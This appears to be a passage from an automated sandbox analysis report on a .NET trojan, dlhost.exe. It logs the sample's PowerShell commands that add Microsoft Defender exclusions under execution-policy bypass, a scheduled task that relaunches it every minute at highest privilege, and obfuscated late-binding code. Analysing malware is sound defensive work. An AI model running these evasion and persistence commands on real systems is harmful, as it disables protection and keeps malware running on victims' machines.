                    Source: dlhost.exe, QVV40VdefjdAZinBcVlX2xoxzxFyfGlyuJtdjIjlQEwy7g.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                    Source: dlhost.exe, QVV40VdefjdAZinBcVlX2xoxzxFyfGlyuJtdjIjlQEwy7g.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: dlhost.exe.0.dr, QVV40VdefjdAZinBcVlX2xoxzxFyfGlyuJtdjIjlQEwy7g.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                    Source: dlhost.exe.0.dr, QVV40VdefjdAZinBcVlX2xoxzxFyfGlyuJtdjIjlQEwy7g.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: classification engineClassification label: mal100.troj.evad.winEXE@16/15@2/3
                    Source: C:\Users\user\Desktop\dlhost.exeFile created: C:\Users\user\dlhost.exeJump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeMutant created: \Sessions\1\BaseNamedObjects\1SU40rsKgSFMJEsi
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2516:120:WilError_03
                    Source: C:\Users\user\dlhost.exeMutant created: NULL
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2764:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:180:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5556:120:WilError_03
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_23mtkc1v.gk4.ps1Jump to behavior
                    Source: dlhost.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: dlhost.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                    Source: C:\Users\user\Desktop\dlhost.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: dlhost.exeVirustotal: Detection: 76%
                    Source: dlhost.exeReversingLabs: Detection: 76%
                    Source: C:\Users\user\Desktop\dlhost.exeFile read: C:\Users\user\Desktop\dlhost.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\dlhost.exe "C:\Users\user\Desktop\dlhost.exe"
                    Source: C:\Users\user\Desktop\dlhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\dlhost.exe'
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\dlhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'dlhost.exe'
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\dlhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\dlhost.exe'
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\dlhost.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "dlhost" /tr "C:\Users\user\dlhost.exe"
                    Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: unknownProcess created: C:\Users\user\dlhost.exe "C:\Users\user\dlhost.exe"
                    Source: unknownProcess created: C:\Users\user\dlhost.exe "C:\Users\user\dlhost.exe"
                    Source: unknownProcess created: C:\Users\user\dlhost.exe C:\Users\user\dlhost.exe
                    Source: C:\Users\user\Desktop\dlhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\dlhost.exe'Jump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'dlhost.exe'Jump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\dlhost.exe'Jump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "dlhost" /tr "C:\Users\user\dlhost.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeSection loaded: avicap32.dllJump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeSection loaded: msvfw32.dllJump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                    Source: C:\Users\user\dlhost.exeSection loaded: mscoree.dll
                    Source: C:\Users\user\dlhost.exeSection loaded: apphelp.dll
                    Source: C:\Users\user\dlhost.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\dlhost.exeSection loaded: version.dll
                    Source: C:\Users\user\dlhost.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\dlhost.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\dlhost.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\dlhost.exeSection loaded: uxtheme.dll
                    Source: C:\Users\user\dlhost.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\dlhost.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\dlhost.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\dlhost.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\dlhost.exeSection loaded: mscoree.dll
                    Source: C:\Users\user\dlhost.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\dlhost.exeSection loaded: version.dll
                    Source: C:\Users\user\dlhost.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\dlhost.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\dlhost.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\dlhost.exeSection loaded: uxtheme.dll
                    Source: C:\Users\user\dlhost.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\dlhost.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\dlhost.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\dlhost.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\dlhost.exeSection loaded: mscoree.dll
                    Source: C:\Users\user\dlhost.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\dlhost.exeSection loaded: version.dll
                    Source: C:\Users\user\dlhost.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\dlhost.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\dlhost.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\dlhost.exeSection loaded: uxtheme.dll
                    Source: C:\Users\user\dlhost.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\dlhost.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\dlhost.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\dlhost.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\Desktop\dlhost.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                    Source: dlhost.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: dlhost.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                    Data Obfuscation

                    barindex
                    .NET source code contains method to dynamically call methods (often used by packers)
                    Source: dlhost.exe, I2KYznln8D87NjrkahmOb6xKzZoIuKaczw3BYZZDDAqtFpqXmrZqOS6OsSYV1Mc5G3E0biU5BhXl05.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{P9Wl56tXtZXRgsjy2OFFAgXPhDYF.lehjA3R3F6mRZdzqiHrDs8semsB4,P9Wl56tXtZXRgsjy2OFFAgXPhDYF.GFMEdSGPtvbqlVKYuswZhKlmpecf,P9Wl56tXtZXRgsjy2OFFAgXPhDYF.MqivN2ewNbPiQwe2jIS4sjUkRtxB,P9Wl56tXtZXRgsjy2OFFAgXPhDYF.XObrqv7RbLGcaIWHWnJ0Z6o16q1Z,KJBjvTdOieJ2vS3ws7tZB9nFKNb65tboJZbkcrpB6A6DLB8v6Cag4PzRdu7y5WYHuCBcjfiZYBG1XRtHa9FCWkDSwZTSp8LW.GYlRUK1wEMzxyc4HzuDcGQaAyoOkwqA1hHEyYmCZBLIxKej2gsyqOLADZPX695S9AaKFQ6qsSml3NtLuJaVCjPRL27NkpfdI()}}, (string[])null, (Type[])null, (bool[])null, true)
                    Source: dlhost.exe, I2KYznln8D87NjrkahmOb6xKzZoIuKaczw3BYZZDDAqtFpqXmrZqOS6OsSYV1Mc5G3E0biU5BhXl05.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Bj42Rfdzc7G32jslX8hX983SODaA4uIjk9QyXT6EKBlM5VABi72swWcnMMmsaTBk[2],KJBjvTdOieJ2vS3ws7tZB9nFKNb65tboJZbkcrpB6A6DLB8v6Cag4PzRdu7y5WYHuCBcjfiZYBG1XRtHa9FCWkDSwZTSp8LW.awxw2asTEc4pfZbjYvfcaQvSAmyPYkRHueewSZLsDBj6dTcE4LGUywwbUwN3m8MJ0kX1hk12Jxy0jFZmr(KJBjvTdOieJ2vS3ws7tZB9nFKNb65tboJZbkcrpB6A6DLB8v6Cag4PzRdu7y5WYHuCBcjfiZYBG1XRtHa9FCWkDSwZTSp8LW.VEZgYMtSoTl6ticJvP9m390RPj7ln74fOUCSpqEVPd34cXtj2OMZFihWpqa4YG3Skf8bu2yZQPMOeVJOzPlacXASNWK6Vobf(Bj42Rfdzc7G32jslX8hX983SODaA4uIjk9QyXT6EKBlM5VABi72swWcnMMmsaTBk[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                    Source: dlhost.exe, I2KYznln8D87NjrkahmOb6xKzZoIuKaczw3BYZZDDAqtFpqXmrZqOS6OsSYV1Mc5G3E0biU5BhXl05.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Bj42Rfdzc7G32jslX8hX983SODaA4uIjk9QyXT6EKBlM5VABi72swWcnMMmsaTBk[2] }}, (string[])null, (Type[])null, (bool[])null, true)
